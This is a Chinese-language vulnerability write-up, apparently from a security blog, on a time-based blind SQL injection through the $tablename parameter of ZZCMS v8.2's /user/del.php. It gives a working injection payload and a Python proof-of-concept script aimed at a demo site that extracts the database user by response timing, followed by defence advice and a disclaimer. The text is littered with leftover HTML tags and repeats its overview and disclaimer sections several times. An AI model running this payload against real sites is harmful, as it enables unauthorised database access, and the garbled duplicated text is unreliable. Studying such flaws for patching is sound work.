ZZCMS v8.2 SQL注入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
ZZCMS v8.2版本存在一个SQL注入漏洞，位于`\/user\/del.php<\/code>文件中。该漏洞由于对$tablename<\/code>参数过滤不严导致，攻击者可以通过构造特殊的SQL语句实现时间盲注。<\/p>`

漏洞分析<\/h2>
漏洞位置<\/h3>

主要文件：\/user\/del.php<\/code><\/li>
相关函数文件：\/inc\/function.php<\/code><\/li>
<\/ul>
代码审计<\/h3>


参数获取<\/strong>：<\/p>

\/user\/del.php<\/code>第12行获取参数<\/li>
$id<\/code>参数由于经过checkid()<\/code>函数检查，无法直接注入<\/li>
<\/ul>
<\/li>

过滤绕过<\/strong>：<\/p>

checkid()<\/code>函数位于\/inc\/function.php<\/code>第49行<\/li>
在\/inc\/function.php<\/code>第135行发现$tablename<\/code>参数可控<\/li>
CMS过滤了大于号(><\/code>)和小于号(<<\/code>)，将其转换为HTML实体<\/li>
<\/ul>
<\/li>

注入点构造<\/strong>：<\/p>

通过控制$tablename<\/code>参数，可以构造如下SQL语句：<\/li>
<\/ul>
select<\/span> id,editor, from<\/span> zzcms_answer where<\/span> id =<\/span> 1<\/span> and<\/span> if<\/span>((ascii(substr(user<\/span>(),1<\/span>,1<\/span>)) =<\/span>121<\/span>),sleep(5<\/span>),1<\/span>)#<\/span>where<\/span> id in<\/span> 1<\/span>;
<\/span><\/span><\/code><\/pre>
无需闭合引号，直接拼接SQL语句<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h2>
测试Payload<\/h3>
id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)%23
<\/code><\/pre>
利用原理<\/h3>

使用时间盲注技术<\/li>
通过if<\/code>条件判断和sleep<\/code>函数实现<\/li>
判断user()<\/code>函数的第一个字符的ASCII码是否为121('y')<\/li>
如果是，则延迟5秒返回，否则立即返回<\/li>
<\/ol>
POC实现<\/h2>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span># -*- coding: utf-8 -*-<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span>payloads =<\/span> 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@'<\/span>  # 匹配用的字符串<\/span>
<\/span><\/span>url =<\/span> "http:\/\/demo.zzcms.net\/user\/del.php"<\/span>
<\/span><\/span>user =<\/span> ''<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>, 2<\/span>):
<\/span><\/span>    for<\/span> payload in<\/span> payloads:  # 遍历取出字符<\/span>
<\/span><\/span>        startTime =<\/span> time.<\/span>time()
<\/span><\/span>        post_data =<\/span> "id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1))="<\/span> +<\/span> str(ord(payload)) +<\/span> "),sleep(5),1)%23"<\/span>.<\/span>encode("utf-8"<\/span>)
<\/span><\/span>        try<\/span>:
<\/span><\/span>            response =<\/span> requests.<\/span>post(url, timeout=<\/span>6<\/span>, data=<\/span>post_data, headers=<\/span>{"Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>})
<\/span><\/span>        except<\/span>:
<\/span><\/span>            pass<\/span>
<\/span><\/span>        if<\/span> time.<\/span>time() -<\/span> startTime ><\/span> 5<\/span>:
<\/span><\/span>            user =<\/span> payload
<\/span><\/span>            print('user is:'<\/span>, user)
<\/span><\/span>            break<\/span>
<\/span><\/span>
<\/span><\/span>print('<\/span>\n<\/span>[Done] current user is <\/span>%s<\/span>'<\/span> %<\/span> user)
<\/span><\/span><\/code><\/pre>POC说明<\/h3>

遍历可能的字符集（字母、数字、特殊符号）<\/li>
对每个字符构造特定的Payload<\/li>
通过响应时间判断是否命中（超过5秒）<\/li>
最终输出数据库用户名的第一个字符<\/li>
<\/ol>
防御建议<\/h2>

对所有用户输入进行严格的过滤和转义<\/li>
使用预编译语句(Prepared Statement)或参数化查询<\/li>
对数据库操作进行权限最小化设置<\/li>
升级到最新版本的ZZCMS<\/li>
<\/ol>
注意事项<\/h2>

该漏洞已报送厂商并修复<\/li>
本文仅限技术研究与讨论<\/li>
严禁用于非法用途<\/li>
实际测试应在授权环境下进行<\/li>
<\/ol>

ZZCMS v8.2 SQL注入漏洞分析与利用<\/h1>

漏洞概述<\/h2> ZZCMS v8.2版本存在一个SQL注入漏洞，位于\/user\/del.php<\/code>文件中。该漏洞由于对$tablename<\/code>参数过滤不严导致，攻击者可以通过构造特殊的SQL语句实现时间盲注。<\/p>

漏洞利用<\/h2>

注意事项<\/h2> 该漏洞已报送厂商并修复<\/li> 本文仅限技术研究与讨论<\/li> 严禁用于非法用途<\/li> 实际测试应在授权环境下进行<\/li> <\/ol>

漏洞概述<\/h2>
ZZCMS v8.2版本存在一个SQL注入漏洞，位于`\/user\/del.php<\/code>文件中。该漏洞由于对$tablename<\/code>参数过滤不严导致，攻击者可以通过构造特殊的SQL语句实现时间盲注。<\/p>`

注意事项<\/h2>

该漏洞已报送厂商并修复<\/li>
本文仅限技术研究与讨论<\/li>
严禁用于非法用途<\/li>
实际测试应在授权环境下进行<\/li> <\/ol>